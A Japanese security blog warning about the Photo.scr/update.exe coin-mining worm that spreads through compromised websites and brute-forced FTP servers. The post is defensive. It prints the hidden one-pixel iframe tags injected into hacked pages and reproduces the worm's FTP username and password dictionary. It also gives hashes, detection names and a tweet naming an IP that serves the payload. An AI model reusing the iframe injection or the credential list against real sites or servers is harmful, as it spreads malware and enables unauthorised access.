初回投稿 2016年10月15日
最終更新 2019年5月5日

【危険】Photo.scr/update.exeウイルス増殖? FTPサーバー感染やダウンロード注意!

Windows のスクリーンセーバー Photo.scr ファイルや実行ファイル update.exeファイルが増殖するウイルス感染被害! 運用している NAS に対して脆弱な FTP サーバー経由のブルートフォースアタックで不正アクセスされるワーク的な攻撃パータンも

何てことない普通の一般サイトを訪問したら、次のようなナゾのファイルをダウンロードするよう促された? 

  • Photo.scr

  • update.exe

  • info.zip

そんな場合、ゼッタイにゼッタイにファイルを開いたらアカーン! ファイルを起動したらダメー! 

このファイル形式は、Windows 向けのスクリーンセーバーや実行ファイルなので、Android スマホ、iOS (iPhone / iPad)、macOS、Linux 上では動作しません。

不正な HTML タグがウイルスのダウンロード?

このファイルをダウンロードするよう促された一般サイトは、改ざん被害を喰らっているパターンです。

実際に改ざんされている一般サイトの HTML ソースを確認すると、次のような感じに 不正なインラインフレームタグ <iframe> が最後尾に挿入されているのでした。

イメージ 2
とある福祉法人のホームページ

イメージ 1
とある会社事業所のホームページ

イメージ 5
とある建設会社のホームページ

イメージ 8
とある旅行会社のホームページ

【最後尾に挿入されるコード例 その1】
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>
【最後尾に挿入されるコード例 その2】
<iframe src=update.exe width=1 height=1 frameborder=0>
</iframe>

改ざん被害を受けている一般サイトはいかがわしいエッチなコンテンツはなく、いわゆる ”怪しいサイト” には分類できないので、普通にネットサーフィンしている途中で偶然出くわすから注意が必要です。

写真? スクリーンセーバー? ファイルの正体

Photo.scr とな…?

表向きは 写真(フォト) だろうけど、ファイルの種類(拡張子)が 「.scr」 です。

写真の形式である JPEG の画像ファイル .jpg ではないから不自然と気づけます。 <ファイルサイズも結構デカい

~ アイコン画像の偽装 ~

イメージ 3
”フォルダー” っぽく見せてユーザーのクリックを誘う手口

ただ、Windows の設定で ファイルの拡張子を表示しない設定が有効 のままだと、「写真が含まれている Photo フォルダー」 と錯覚して、うっかりダブルクリックして起動する危険性があります。

イメージ 4
”フォルダー” にしか見えない…

拡張子 .scr は Windows パソコンでスクリーンセーバー という形式であり、ファイルの拡張子についての知識 があれば、難なく不正なプログラム(ウイルス) を見抜けましょう。

マルウェアの詳細やセキュリティ関連の記事

セキュリティ製品のウイルス検出名

この不正なファイルは、主要な Windows 向けセキュリティソフトでほぼ100%脅威と判定するので、マルウェアと気づくことなく誤って開く可能性は低いかと思います。 <セキュリティソフトを無効化しているとかは論外!

【ファイルのハッシュ値 と VirusTotalの結果】
《Photo.scr》

サイズ 1.50 MB (1,578,496 バイト)
MD5 aba2d86ed17f587eb6d57e6c75f64f05
SHA-1 aeccba64f4dd19033ac2226b4445faac05c88b76

《update.exe》
340A7FEAB3A126973B31B5224D0514D3

《NsCpuCNMiner32.exe》
【セキュリティソフトの検出名例】
avast Win32:CryptoMiner-Z [Trj]
Avira TR/BitCoinMiner.fra
BitDefender Trojan.AgentWDCR.HWR Trojan.AgentWDCR.ERF
ESET Win32/Crytes.AA Win32/BitCoinMiner.BX
Kaspersky Trojan.Win32.Agentb.btdr Trojan.Win32.Miner.ays
Malwarebytes Trojan.BitCoinMiner
McAfee Generic.zn Trojan-CoinMiner
Microsoft Trojan:Win32/CoinMiner.BB!bit Trojan:Win32/CoinMiner!rfn
Sophos Troj/Miner-CZ Mal/Miner-C
Symantec SMG.Heur!gen Trojan.Coinbitminer
Trend Micro WORM_COINMINE.NC WORM_COINMINER.RT

セキュリティ会社の脅威情報によると、ウイルス感染時の症状は次のような感じになりましょう。 <ワーム的な挙動からマルウェアの拡散する加害者にもなってしまう

  1. Windows マシンのリソースを使って仮想通貨ビットコインをマイニングする

  2. 感染マシン内にある php ファイルや html ファイルを改ざんする
    → 不正なインラインフレームタグ <iframe> を最後尾に挿入する

  3. Windows マシンのあらゆるフォルダーに Photo.scr ファイルのコピーを投下して増殖する

  4. 世界中の脆弱な FTP サーバーにブルートフォース攻撃で不正アクセスする
    → サーバー上に問題の Photo.scr ファイルをアップロードしていく

実行ファイル単体で配布されている おすすめウイルス削除ツール(無料) をまず入手し、Windows パソコンの場合はウイルスが動かない状態の セーフモード起動 の状態でウイルススキャンで駆除しましょう。



FTP サーバーのユーザー名やパスワード

このマルウェアには、世界中の脆弱な FTP サーバーにブルートフォース攻撃で不正アクセスする機能があり、実際に使われるユーザー名やパスワード文字列がマルウェアのデータ内に記載されてあります。

イメージ 7
総当たり攻撃するためのパスワードリスト

【ftp サーバーに不正アクセスするユーザー名&パスワード例】
000000 111111 123 123123 1234 12345 123456 1234567 12345678 123456789 1234567890 123qwe abc123 Admin admin123 administrator anonymous derok010101 devry email@email.com ftp pass pass1234 password qwerty test windows www-data 無題な濃いログ

複雑なパスワード文字列でも何でもない、数字の羅列、キーボードの配列、辞書に載っている定番の英単語、いわゆる 「使ってはいけない危険なパスワード」 として、これらはお馴染みかと思います。 

NASがBitcoinMinerに感染! - hariwiki@Wiki
https://w.atwiki.jp/hariwiki/pages/16.html

マルウェア?:Photo.scr - My Journal
http://young-at-heart.club/my_journal/2019/06/09/

● けろさんのツイート: "うちの鯖に時々ssh attackしてくる111 dot 64 dot 207 dot 217、80番開きに行くとWin32/Crytes.AA入りのPhoto.scrのダウンロードが始まるので怖い物みたい人は開いてみて"
https://twitter.com/kero7/status/914917127294918656

● 北浜のるてさんのツイート: "外付けHDDを一時期wifiルータ使ってNASみたくしてたんだけど、どうも侵入されてマルウェア(Photo.scr)仕掛けられてたらしくてアレだな"
https://twitter.com/norte_kita/status/1125340401819250688
NAS サーバーを悪用し仮想通貨を採掘するマルウェア 自社の NAS サーバーは大丈夫? - Sophos
https://nakedsecurity.sophos.com/ja/2016/09/08/

The PhotoMiner Campaign - GuardiCore
https://www.guardicore.com/2016/06/the-photominer-campaign/

Obfuscated Bitcoin Miner Propagates Through FTP Using Password Dictionary - Fortinet
https://www.fortinet.com/blog/threat-research/obfuscated-bitcoin-miner-propagates-through-ftp-using-password-dictionary.html